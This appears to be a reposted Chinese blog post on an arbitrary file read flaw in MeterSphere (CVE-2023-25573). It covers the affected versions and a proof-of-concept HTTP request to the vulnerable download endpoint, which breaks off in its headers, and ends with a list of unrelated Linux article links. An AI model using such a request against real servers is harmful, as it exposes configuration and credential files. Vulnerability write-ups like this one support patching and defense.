博客
关于我
MeterSphere files 任意文件读取漏洞复现 (CVE-2023-25573)
阅读量:797 次
发布时间:2023-02-08

本文共 525 字,大约阅读时间需要 1 分钟。

MeterSphere 产品简介

MeterSphere 是一站式开源持续测试平台,整合了测试跟踪、接口测试、UI 测试和性能测试等功能,完美兼容 JMeter、Selenium 等主流开源标准,为开发人员和测试人员提供了全面的测试解决方案。

安全告知:文件读取漏洞

系统中 /api/jmeter/download/files 路径存在文件读取漏洞,攻击者可利用此漏洞读取重要系统文件,如数据库配置文件、系统配置文件等,造成网站安全性严重受损。

影响范围

该漏洞影响 MeterSphere 的以下版本:

  • MeterSphere v2.6.2 及之前版本
  • MeterSphere v1.20.19 LTS 及之前版本

漏洞复现环境

系统运行中存在该漏洞,建议及时修复以保障系统安全。

漏洞复现示例

PoC 提供以下示例:

POST /api/jmeter/download/files HTTP/1.1

Host: your-ip
Content-Type: application/json
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_1

转载地址:http://sryfk.baihongyu.com/

你可能感兴趣的文章
Linux 环境下将 ASM 磁盘映射到物理磁盘的完整指南
查看>>
Linux 进程间通信 --- 信号通信 --- signal --- signal(SIGINT, my_func); --- 按键驱动异步通知...
查看>>
Linux--进程状态
查看>>
Linux——静态库
查看>>
Linux下安装或升级Python 2.7
查看>>
Linux下的系统监控与性能调优:从入门到精通
查看>>
Linux安装Tomcat
查看>>
Linux就这个范儿 第18章 这里也是鼓乐笙箫 Linux读写内存数据的三种方式
查看>>
Linux根文件系统详解
查看>>
linux系统常用监控系统状态信息命令
查看>>
Linux系统数据实时备份工具
查看>>
linux系统监控与硬盘分区/格式化/文件系统管理
查看>>
Linux系统调用分析
查看>>
Linux经常使用命令(十一) - more
查看>>
linux缓存nscd
查看>>
linux软件包的一般安装方法
查看>>
linux软件包:RPM包、源码包、yum在线
查看>>
Linux进程地址管理之mm_struct
查看>>
Linux部署Elasticsearch(一):下载和部署Elasticsearch
查看>>
Linux高阶知识:Linux 中的隐藏文件
查看>>